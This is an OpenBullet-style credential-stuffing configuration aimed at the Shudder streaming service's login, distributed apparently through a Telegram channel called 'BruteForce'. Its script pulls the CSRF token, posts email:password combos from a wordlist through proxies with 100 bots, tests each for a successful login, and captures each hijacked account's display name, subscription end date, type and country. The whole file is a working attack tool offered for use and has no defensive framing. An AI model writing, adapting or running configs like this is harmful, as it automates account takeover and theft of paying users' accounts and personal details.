[SETTINGS]
{
  "Name": "Shudder",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-13T23:04:54.3634064+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Capture | Move Free To Custom | CPM Rate: 30-500 |",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.shudder.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "<meta name=\"csrf-token\" content=\"" "\">" -> VAR "Token" 

REQUEST POST "https://www.shudder.com/auth/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 61" 
  HEADER "csrf-token: <Token>" 
  HEADER "origin: https://www.shudder.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.shudder.com/login" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
  KEYCHAIN Success OR 
    KEY "subscriptions" 

#displayName PARSE "<SOURCE>" JSON "displayName" CreateEmpty=FALSE -> CAP "Display Name" 

#Sub_end_date PARSE "<SOURCE>" JSON "current_period_end_date" CreateEmpty=FALSE -> CAP "Sub end date" 

#type PARSE "<SOURCE>" JSON "type" CreateEmpty=FALSE -> CAP "Sub type" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "Country" 

#adobeSkuActive PARSE "<SOURCE>" JSON "adobeSkuActive" CreateEmpty=FALSE -> CAP "adobe Sku Active" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "subscriptions\": []," 

#CC FUNCTION Constant " T.me/BruteForce " -> CAP " Join Telegram Channel:" 

